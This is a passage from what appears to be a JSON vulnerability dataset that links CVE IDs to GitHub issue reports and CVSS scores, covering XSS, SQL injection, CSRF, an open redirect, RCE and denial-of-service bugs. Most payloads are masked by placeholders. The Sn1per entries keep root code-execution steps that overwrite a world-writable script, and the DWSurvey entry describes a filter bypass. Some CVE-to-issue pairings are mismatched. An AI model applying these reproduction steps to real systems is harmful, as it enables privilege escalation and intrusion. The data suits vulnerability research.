  69402. "description": "Telnet servers potentially lead to non-terminating acknowledgment loops. Hello, In the telnet server implementation up to version NUMBERTAG and even the latest commit NUMBERTAG b5b NUMBERTAG , potential non-terminating acknowledgment loops have been found. To prevent such loops, one rule in RFC NUMBERTAG URLTAG is that a request must not be acknowledged if a party receives what appears to be a request to enter a mode it is already in. However, when the negotiated options are already disabled, the server still responds to DONT and WONT requests with WONT or DONT commands. Hence, a potential infinite acknowledgment loop exists in the telnet server at run time, which may lead to denial of service and excessive CPU consumption. Could you have a check? Thanks a lot.",
  69403. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  69404. "severity": "HIGH",
  69405. "baseScore": 7.5,
  69406. "impactScore": 3.6,
  69407. "exploitabilityScore": 3.9
  69408. },
  69409. {
  69410. "CVE_ID": "CVE-2021-38384",
  69411. "Issue_Url_old": "https://github.com/dherault/serverless-offline/issues/1259",
  69412. "Issue_Url_new": "https://github.com/dherault/serverless-offline/issues/1259",
  69413. "Repo_new": "dherault/serverless-offline",
  69414. "Issue_Created_At": "2021-08-05T18:28:59Z",
  69415. "description": "Custom Authorizer and AWS deployed stack don't have the same behavior. Bug Report APITAG Current Behavior APITAG When using a Custom Authorizer, the behaviour of serverless offline differs from the deployed stack on AWS. Sample Code APITAG This is where we define the function event trigger. As it's clear to see, we expect a HTTP POST on APITAG file: FILETAG APITAG Our custom authorizer APITAG method looks like this. file: FILETAG CODETAG We're basically generating the following policy to someone with the role \"USER\": CODETAG Expected behavior/code APITAG When testing locally using serverless offline, fetching the endpoint URLTAG the response is NUMBERTAG Forbidden as the screenshot shows URLTAG . But when we deploy the stack to AWS, fetching the endpoint URLTAG the result is NUMBERTAG ok as its seen here URLTAG . Environment serverless version NUMBERTAG APITAG version NUMBERTAG APITAG version: APITAG OS : Linux Mint NUMBERTAG Tessa Additional APITAG APITAG We found this issue while doing the research The Fault in Our Stars URLTAG , in which we explore how API Gateway Execute API Policy works under different conditions. One researcher from our company opened the issue NUMBERTAG URLTAG where he indicates another incorrectly behaviour by serverless offline regarding the way it evaluates policies. It still lacks a response to this date.",
  69416. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69417. "severity": "CRITICAL",
  69418. "baseScore": 9.8,
  69419. "impactScore": 5.9,
  69420. "exploitabilityScore": 3.9
  69421. },
  69422. {
  69423. "CVE_ID": "CVE-2021-38386",
  69424. "Issue_Url_old": "https://github.com/contiki-os/contiki/issues/2687",
  69425. "Issue_Url_new": "https://github.com/contiki-os/contiki/issues/2687",
  69426. "Repo_new": "contiki-os/contiki",
  69427. "Issue_Created_At": "2021-08-08T13:52:04Z",
  69428. "description": "Incorrectly executing commands of telnet servers. Telnet servers can execute many commands from clients like _ls_, _help_, _write_ and _append_. For example, the _ls_ command is able to show the contents of a certain directory in remote servers, and then servers reply executing results to clients. However, telnet servers don't correctly handle all commands. This bug could be reproduced in the case of showing the content of a directory with many files.",
  69429. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  69430. "severity": "HIGH",
  69431. "baseScore": 7.5,
  69432. "impactScore": 3.6,
  69433. "exploitabilityScore": 3.9
  69434. },
  69435. {
  69436. "CVE_ID": "CVE-2021-38387",
  69437. "Issue_Url_old": "https://github.com/contiki-os/contiki/issues/2688",
  69438. "Issue_Url_new": "https://github.com/contiki-os/contiki/issues/2688",
  69439. "Repo_new": "contiki-os/contiki",
  69440. "Issue_Created_At": "2021-08-08T14:00:28Z",
  69441. "description": "Silent quit of telnet servers leading to clients waiting forever. After telnet clients connect with telnet servers and send requests to servers, clients are blocked until receiving the responses from servers. So when the telnet server interrupts unexpectedly, the server should give an alert to clients. However, telnet servers often quit silently, thereby leading to clients waiting forever.",
  69442. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  69443. "severity": "HIGH",
  69444. "baseScore": 7.5,
  69445. "impactScore": 3.6,
  69446. "exploitabilityScore": 3.9
  69447. },
  69448. {
  69449. "CVE_ID": "CVE-2021-3850",
  69450. "Issue_Url_old": "https://github.com/ADOdb/ADOdb/issues/793",
  69451. "Issue_Url_new": "https://github.com/adodb/adodb/issues/793",
  69452. "Repo_new": "adodb/adodb",
  69453. "Issue_Created_At": "2022-01-16T15:49:35Z",
  69454. "description": "Reserved.",
  69455. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  69456. "severity": "CRITICAL",
  69457. "baseScore": 9.1,
  69458. "impactScore": 5.2,
  69459. "exploitabilityScore": 3.9
  69460. },
  69461. {
  69462. "CVE_ID": "CVE-2021-38712",
  69463. "Issue_Url_old": "https://github.com/helloxz/onenav/issues/25",
  69464. "Issue_Url_new": "https://github.com/helloxz/onenav/issues/25",
  69465. "Repo_new": "helloxz/onenav",
  69466. "Issue_Created_At": "2021-08-04T08:58:49Z",
  69467. "description": "Information disclosure of the SQLite database. I downloaded this CMS and installed it. FILETAG APITAG CODETAG Vulnerable code: APITAG I then requested PATHTAG and PATHTAG and got HTTP response status NUMBERTAG, which means onenav.db3 and FILETAG can be downloaded directly from the web root and may expose private information. Suggested mitigation: add a random component to the document and SQLite database file names; a more robust fix is to store the database outside the web root or to deny web access to it in the web server configuration. This CMS has many users.",
  69468. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  69469. "severity": "HIGH",
  69470. "baseScore": 7.5,
  69471. "impactScore": 3.6,
  69472. "exploitabilityScore": 3.9
  69473. },
  69474. {
  69475. "CVE_ID": "CVE-2021-38713",
  69476. "Issue_Url_old": "https://github.com/helloxz/imgurl/issues/72",
  69477. "Issue_Url_new": "https://github.com/helloxz/imgurl/issues/72",
  69478. "Repo_new": "helloxz/imgurl",
  69479. "Issue_Created_At": "2021-08-16T02:29:43Z",
  69480. "description": "Stored cross site scripting (XSS) via an HTTP request header of the upload request. Hi, how is it going? I tested the imgurl upload functions and found an XSS vulnerability. First step: put the payload in a header of the upload request: ERRORTAG FILETAG FILETAG Second step: when the web administrator clicks FILETAG the stored payload is triggered FILETAG FILETAG Suggested fix: filter special characters from all request header values (original note in Chinese: filter all special characters in the HTTP request headers). A more robust fix is to HTML encode header derived values at the point where they are rendered in the admin page, rather than relying on input filtering alone.",
  69481. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  69482. "severity": "MEDIUM",
  69483. "baseScore": 5.4,
  69484. "impactScore": 2.7,
  69485. "exploitabilityScore": 2.3
  69486. },
  69487. {
  69488. "CVE_ID": "CVE-2021-38721",
  69489. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/584",
  69490. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/584",
  69491. "Repo_new": "daylightstudio/fuel-cms",
  69492. "Issue_Created_At": "2021-08-10T01:37:40Z",
  69493. "description": "FUEL CMS NUMBERTAG contains a cross site request forgery (CSRF) vulnerability in the password modification page: a logged in user who visits an attacker controlled page can have their password changed without their consent. Because my mail function is not configured, the attack could not be demonstrated end to end. URLTAG FILETAG CSRF PoC: CODETAG",
  69494. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  69495. "severity": "MEDIUM",
  69496. "baseScore": 6.5,
  69497. "impactScore": 3.6,
  69498. "exploitabilityScore": 2.8
  69499. },
  69500. {
  69501. "CVE_ID": "CVE-2021-38723",
  69502. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/583",
  69503. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/583",
  69504. "Repo_new": "daylightstudio/fuel-cms",
  69505. "Issue_Created_At": "2021-08-10T01:26:43Z",
  69506. "description": "FUEL CMS NUMBERTAG allows SQL Injection via parameter 'col' in PATHTAG FILETAG CODETAG payload: APITAG FILETAG FILETAG You can see that when you modify the sleep value, the response has a significant delay.",
  69507. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  69508. "severity": "HIGH",
  69509. "baseScore": 8.8,
  69510. "impactScore": 5.9,
  69511. "exploitabilityScore": 2.8
  69512. },
  69513. {
  69514. "CVE_ID": "CVE-2021-38725",
  69515. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/581",
  69516. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/581",
  69517. "Repo_new": "daylightstudio/fuel-cms",
  69518. "Issue_Created_At": "2021-08-09T03:09:21Z",
  69519. "description": "Fuel CMS NUMBERTAG is vulnerable to brute force on the forgot password page. Because there is no limit on the number of attempts, an attacker can submit candidate addresses repeatedly until the administrator's email address is confirmed (user enumeration). FILETAG FILETAG FILETAG",
  69520. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  69521. "severity": "MEDIUM",
  69522. "baseScore": 5.3,
  69523. "impactScore": 1.4,
  69524. "exploitabilityScore": 3.9
  69525. },
  69526. {
  69527. "CVE_ID": "CVE-2021-38727",
  69528. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/582",
  69529. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/582",
  69530. "Repo_new": "daylightstudio/fuel-cms",
  69531. "Issue_Created_At": "2021-08-10T01:22:52Z",
  69532. "description": "FUEL CMS NUMBERTAG allows SQL Injection via parameter 'col' in PATHTAG FILETAG FILETAG CODETAG payload : APITAG FILETAG FILETAG You can see that when you modify the sleep value, the response has a significant delay.",
  69533. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69534. "severity": "CRITICAL",
  69535. "baseScore": 9.8,
  69536. "impactScore": 5.9,
  69537. "exploitabilityScore": 3.9
  69538. },
  69539. {
  69540. "CVE_ID": "CVE-2021-38751",
  69541. "Issue_Url_old": "https://github.com/exponentcms/exponent-cms/issues/1544",
  69542. "Issue_Url_new": "https://github.com/exponentcms/exponent-cms/issues/1544",
  69543. "Repo_new": "exponentcms/exponent-cms",
  69544. "Issue_Created_At": "2021-08-10T04:04:36Z",
  69545. "description": "HTTP Host header injection. The Host value in the HTTP request is not validated. Modifying the Host header of a request changes all generated links in the response to an arbitrary attacker chosen value. An example request, the resulting response, and the location of the bug in the source code are included. FILETAG",
  69546. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  69547. "severity": "MEDIUM",
  69548. "baseScore": 4.3,
  69549. "impactScore": 1.4,
  69550. "exploitabilityScore": 2.8
  69551. },
  69552. {
  69553. "CVE_ID": "CVE-2021-38754",
  69554. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/7",
  69555. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/7",
  69556. "Repo_new": "kishan0725/hospital-management-system",
  69557. "Issue_Created_At": "2021-08-11T02:47:29Z",
  69558. "description": "SQL Injection Vulnerability in Message Search. Intercept message search and save contents into a text file. FILETAG Run APITAG FILETAG",
  69559. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69560. "severity": "CRITICAL",
  69561. "baseScore": 9.8,
  69562. "impactScore": 5.9,
  69563. "exploitabilityScore": 3.9
  69564. },
  69565. {
  69566. "CVE_ID": "CVE-2021-38755",
  69567. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/5",
  69568. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/5",
  69569. "Repo_new": "kishan0725/hospital-management-system",
  69570. "Issue_Created_At": "2021-08-11T02:12:04Z",
  69571. "description": "Unauthenticated doctor deletion vulnerability (missing authorization check). A crafted HTTP request can delete doctor records without being authenticated as receptionist or admin, i.e. the deletion endpoint performs no authentication or authorization check. FILETAG Before: FILETAG After: FILETAG",
  69572. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  69573. "severity": "MEDIUM",
  69574. "baseScore": 5.3,
  69575. "impactScore": 1.4,
  69576. "exploitabilityScore": 3.9
  69577. },
  69578. {
  69579. "CVE_ID": "CVE-2021-38756",
  69580. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/4",
  69581. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/4",
  69582. "Repo_new": "kishan0725/hospital-management-system",
  69583. "Issue_Created_At": "2021-08-11T01:57:20Z",
  69584. "description": "Persistent Cross Site Scripting (XSS) Vulnerability in Prescription. Add XSS in Prescription as DOCTOR FILETAG Login as ADMIN FILETAG Persistent XSS upon logging in as ADMIN FILETAG Issue in FILETAG FILETAG",
  69585. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  69586. "severity": "MEDIUM",
  69587. "baseScore": 6.1,
  69588. "impactScore": 2.7,
  69589. "exploitabilityScore": 2.8
  69590. },
  69591. {
  69592. "CVE_ID": "CVE-2021-38757",
  69593. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/6",
  69594. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/6",
  69595. "Repo_new": "kishan0725/hospital-management-system",
  69596. "Issue_Created_At": "2021-08-11T02:15:37Z",
  69597. "description": "Persistent Cross Site Scripting (XSS) Vulnerability in Contact Page. Add XSS to message section of Contact page to target receptionist/admin. FILETAG Log in as receptionist/admin. FILETAG FILETAG",
  69598. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  69599. "severity": "MEDIUM",
  69600. "baseScore": 6.1,
  69601. "impactScore": 2.7,
  69602. "exploitabilityScore": 2.8
  69603. },
  69604. {
  69605. "CVE_ID": "CVE-2021-39157",
  69606. "Issue_Url_old": "https://github.com/sonicdoe/detect-character-encoding/issues/15",
  69607. "Issue_Url_new": "https://github.com/sonicdoe/detect-character-encoding/issues/15",
  69608. "Repo_new": "sonicdoe/detect-character-encoding",
  69609. "Issue_Created_At": "2018-11-06T09:49:01Z",
  69610. "description": "A native crash in the addon, reachable with a single byte input; the fix up diff below adds a NULL check on the charset match result, which suggests a NULL pointer dereference (to be confirmed). CRASH STACK NUMBERTAG fbf NUMBERTAG ea NUMBERTAG in APITAG const () from PATHTAG NUMBERTAG fbf NUMBERTAG d NUMBERTAG b in APITAG const&) () from PATHTAG NUMBERTAG fbf NUMBERTAG cf NUMBERTAG in APITAG const&) () from PATHTAG USE THIS DEMO TO REPRODUCE: function APITAG { APITAG let APITAG = new Buffer('AD', 'hex'); const APITAG = require('detect character encoding'); const APITAG = APITAG APITAG APITAG } FIXUP DIFF: diff git APITAG APITAG index APITAG NUMBERTAG APITAG +++ APITAG APITAG NUMBERTAG APITAG APITAG { APITAG = APITAG APITAG + if(NULL == APITAG { + ERRORTAG to charset not match.\"); + APITAG + return; + } + APITAG { ERRORTAG to detect charset.\"); APITAG",
  69611. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  69612. "severity": "HIGH",
  69613. "baseScore": 7.5,
  69614. "impactScore": 3.6,
  69615. "exploitabilityScore": 3.9
  69616. },
  69617. {
  69618. "CVE_ID": "CVE-2021-39191",
  69619. "Issue_Url_old": "https://github.com/zmartzone/mod_auth_openidc/issues/672",
  69620. "Issue_Url_new": "https://github.com/openidc/mod_auth_openidc/issues/672",
  69621. "Repo_new": "openidc/mod_auth_openidc",
  69622. "Issue_Created_At": "2021-09-02T16:50:58Z",
  69623. "description": "Open redirect via the target_link_uri parameter. see URLTAG thanks MENTIONTAG Recently we forged a URL for a phishing attack that redirects the user, after authentication at our OP, to any site of our choice. The forged URL is as follows: APITAG Example: APITAG After authentication, the user is redirected to FILETAG According to the APITAG Connect documentation, URLTAG > \"target_link_uri > OPTIONAL. URL that the RP is requested to redirect to after authentication. RPs MUST verify the value of the target_link_uri to prevent being used as an open redirector to external sites.\" > Does the module verify the value of target_link_uri to prevent it from being used as an open redirector to external sites, and how is that configured in the module?",
  69624. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  69625. "severity": "MEDIUM",
  69626. "baseScore": 6.1,
  69627. "impactScore": 2.7,
  69628. "exploitabilityScore": 2.8
  69629. },
  69630. {
  69631. "CVE_ID": "CVE-2021-39194",
  69632. "Issue_Url_old": "https://github.com/charleskorn/kaml/issues/179",
  69633. "Issue_Url_new": "https://github.com/charleskorn/kaml/issues/179",
  69634. "Repo_new": "charleskorn/kaml",
  69635. "Issue_Created_At": "2021-09-02T18:45:21Z",
  69636. "description": "Polymorphic serialization hangs. Hello. Many thanks for this great library. We ran into an issue that is quite strange. The deserialization hangs in this specific case, meaning that the process does not terminate, but uses NUMBERTAG CPU. CODETAG This is what I see when I pause and enter debugger FILETAG",
  69637. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  69638. "severity": "MEDIUM",
  69639. "baseScore": 6.5,
  69640. "impactScore": 3.6,
  69641. "exploitabilityScore": 2.8
  69642. },
  69643. {
  69644. "CVE_ID": "CVE-2021-39222",
  69645. "Issue_Url_old": "https://github.com/nextcloud/spreed/issues/542",
  69646. "Issue_Url_new": "https://github.com/nextcloud/spreed/issues/542",
  69647. "Repo_new": "nextcloud/spreed",
  69648. "Issue_Created_At": "2018-01-06T10:37:14Z",
  69649. "description": "When APITAG NUMBERTAG get released?. General Question When APITAG NUMBERTAG get released? Thanks",
  69650. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  69651. "severity": "MEDIUM",
  69652. "baseScore": 6.1,
  69653. "impactScore": 2.7,
  69654. "exploitabilityScore": 2.8
  69655. },
  69656. {
  69657. "CVE_ID": "CVE-2021-39273",
  69658. "Issue_Url_old": "https://github.com/1N3/Sn1per/issues/358",
  69659. "Issue_Url_new": "https://github.com/1n3/sn1per/issues/358",
  69660. "Repo_new": "1N3/Sn1per",
  69661. "Issue_Created_At": "2021-08-17T15:43:44Z",
  69662. "description": "Insecure permissions NUMBERTAG recursively set on installation directory and all files after running main script allow privilege escalation/code execution as root. Sn1per NUMBERTAG free edition, Ubuntu NUMBERTAG Installation directory permissions before first run of the script: root APITAG ls la PATHTAG total NUMBERTAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG Dockerfile rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG bin drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG conf rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG loot drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG modes drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG plugins drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG pro rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG sniper rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG templates rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG wordlists Running sn1per: root APITAG sniper t APITAG [ ] Loaded configuration file from PATHTAG [OK] [ ] Loaded configuration file from APITAG [OK] [ ] Saving loot to PATHTAG [OK] [ ] Scanning APITAG [OK] ... [ ] Opening loot directory PATHTAG [OK] + =[ Generating reports... [snip] + =[ Sorting all files... + =[ Removing blank screenshots and files... 
+ =[ Sn1per Professional is not installed. To download Sn1per Professional, go to FILETAG + =[ Done! Permissions on installation directory after script finishes: root APITAG ls la PATHTAG total NUMBERTAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG Dockerfile rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG bin drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG conf rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG loot drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG modes drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG plugins drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG pro rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwsrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG sniper rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG templates rwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG wordlists Issue: Lines NUMBERTAG from init function from main script: chmod NUMBERTAG Rf $INSTALL_DIR NUMBERTAG dev/null chown root $INSTALL_DIR/sniper NUMBERTAG dev/null chmod NUMBERTAG INSTALL_DIR/sniper NUMBERTAG dev/null",
  69663. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  69664. "severity": "HIGH",
  69665. "baseScore": 8.8,
  69666. "impactScore": 5.9,
  69667. "exploitabilityScore": 2.8
  69668. },
  69669. {
  69670. "CVE_ID": "CVE-2021-39274",
  69671. "Issue_Url_old": "https://github.com/1N3/Sn1per/issues/357",
  69672. "Issue_Url_new": "https://github.com/1n3/sn1per/issues/357",
  69673. "Repo_new": "1N3/Sn1per",
  69674. "Issue_Created_At": "2021-08-17T15:39:45Z",
  69675. "description": "Insecure permissions NUMBERTAG on installation folder after running install script allow code execution/privilege escalation.. Sn1per NUMBERTAG free, tested on Ubuntu NUMBERTAG root APITAG uname a Linux snipertest NUMBERTAG gcp NUMBERTAG Ubuntu SMP Wed Jul NUMBERTAG UTC NUMBERTAG APITAG root APITAG cat /etc/lsb release APITAG DISTRIB_RELEASE NUMBERTAG DISTRIB_CODENAME=hirsute APITAG NUMBERTAG Issue is from FILETAG script lines NUMBERTAG snip] mkdir p $INSTALL_DIR NUMBERTAG dev/null chmod NUMBERTAG Rf $INSTALL_DIR NUMBERTAG dev/null chown root $INSTALL_DIR/sniper NUMBERTAG dev/null chmod NUMBERTAG INSTALL_DIR/sniper NUMBERTAG dev/null [snip] root APITAG ls ld PATHTAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG PATHTAG user APITAG id uid NUMBERTAG user) gid NUMBERTAG user) APITAG sudoers) user APITAG cd PATHTAG PATHTAG ls la total NUMBERTAG drwxrwxrw NUMBERTAG root root NUMBERTAG Aug NUMBERTAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG Dockerfile rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG bin drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG conf rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG loot drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG modes drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG plugins drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG pro rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG sniper rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG APITAG drwxr 
xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG templates rwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG FILETAG drwxr xr NUMBERTAG root root NUMBERTAG Aug NUMBERTAG wordlists NUMBERTAG Code execution as root via main script modification: PATHTAG mv sniper . APITAG PATHTAG echo \"touch /proof\" > sniper PATHTAG cat . APITAG >> sniper PATHTAG chmod +x sniper PATHTAG ls la sniper rwxrwxr NUMBERTAG user user NUMBERTAG Aug NUMBERTAG sniper PATHTAG root APITAG sniper [ ] Loaded configuration file from PATHTAG [OK] [ ] Loaded configuration file from APITAG [OK] ____ _________ / _/___ ___ _____ / ___/ __ \\ / // __ \\/ _ \\/ ___/ (__ ) / / // // /_/ / __/ / PATHTAG PATHTAG PATHTAG /_/ + =[ FILETAG + =[ Sn1per NUMBERTAG by MENTIONTAG You need to specify a target or workspace to use. Type sniper help for command usage. root APITAG root APITAG ls la /proof rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG proof NUMBERTAG Code execution as root via config file modification PATHTAG mv APITAG . APITAG PATHTAG echo \"touch /proof2\" > APITAG PATHTAG cat . APITAG >> APITAG PATHTAG root APITAG ls la /proof2 ls: cannot access '/proof2': No such file or directory root APITAG sniper [ ] Loaded configuration file from PATHTAG [OK] [ ] Loaded configuration file from APITAG [OK] ____ _________ / _/___ ___ _____ / ___/ __ \\ / // __ \\/ _ \\/ ___/ (__ ) / / // // /_/ / __/ / PATHTAG PATHTAG PATHTAG /_/ + =[ FILETAG + =[ Sn1per NUMBERTAG by MENTIONTAG You need to specify a target or workspace to use. Type sniper help for command usage. root APITAG ls la /proof2 rw r r NUMBERTAG root root NUMBERTAG Aug NUMBERTAG proof2 root APITAG",
  69676. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69677. "severity": "CRITICAL",
  69678. "baseScore": 9.8,
  69679. "impactScore": 5.9,
  69680. "exploitabilityScore": 3.9
  69681. },
  69682. {
  69683. "CVE_ID": "CVE-2021-39371",
  69684. "Issue_Url_old": "https://github.com/geopython/OWSLib/issues/790",
  69685. "Issue_Url_new": "https://github.com/geopython/owslib/issues/790",
  69686. "Repo_new": "geopython/owslib",
  69687. "Issue_Created_At": "2021-07-29T18:30:55Z",
  69688. "description": "Proposal to replace lxml with defusedxml for parsing untrusted XML. The XML parsing vulnerabilities that arise from using lxml on untrusted input (the class of issues, such as external entity expansion, that defusedxml is designed to mitigate) can be addressed by using defusedxml URLTAG . I've had success with simply replacing APITAG with APITAG .",
  69689. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  69690. "severity": "HIGH",
  69691. "baseScore": 7.5,
  69692. "impactScore": 3.6,
  69693. "exploitabilityScore": 3.9
  69694. },
  69695. {
  69696. "CVE_ID": "CVE-2021-39383",
  69697. "Issue_Url_old": "https://github.com/wkeyuan/DWSurvey/issues/81",
  69698. "Issue_Url_new": "https://github.com/wkeyuan/dwsurvey/issues/81",
  69699. "Repo_new": "wkeyuan/dwsurvey",
  69700. "Issue_Created_At": "2021-08-16T02:59:50Z",
  69701. "description": "There is a remote command execution vulnerability. The save method in the PATHTAG file writes parameters received directly from the client into a file, and that file is then directly included by FILETAG , resulting in RCE. A file write is performed on the specified file in the APITAG method FILETAG In the save method, the APITAG method is invoked to write FILETAG , and the APITAG variable comes from the assignment at the beginning of the save method. FILETAG FILETAG FILETAG The APITAG method of the APITAG class applies its request parameter filter only when the URI contains APITAG FILETAG The filter mainly substitutes Chinese characters for special characters FILETAG Because the decision to call the filter depends on whether the URI contains APITAG , it can be bypassed by prepending APITAG to the path; the filter is effectively a denylist on the URI rather than a check on the parameter values themselves. Finally, FILETAG shows that the file is included FILETAG PoC: ERRORTAG Visit URLTAG , and the RCE succeeds: FILETAG",
  69702. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69703. "severity": "CRITICAL",
  69704. "baseScore": 9.8,
  69705. "impactScore": 5.9,
  69706. "exploitabilityScore": 3.9
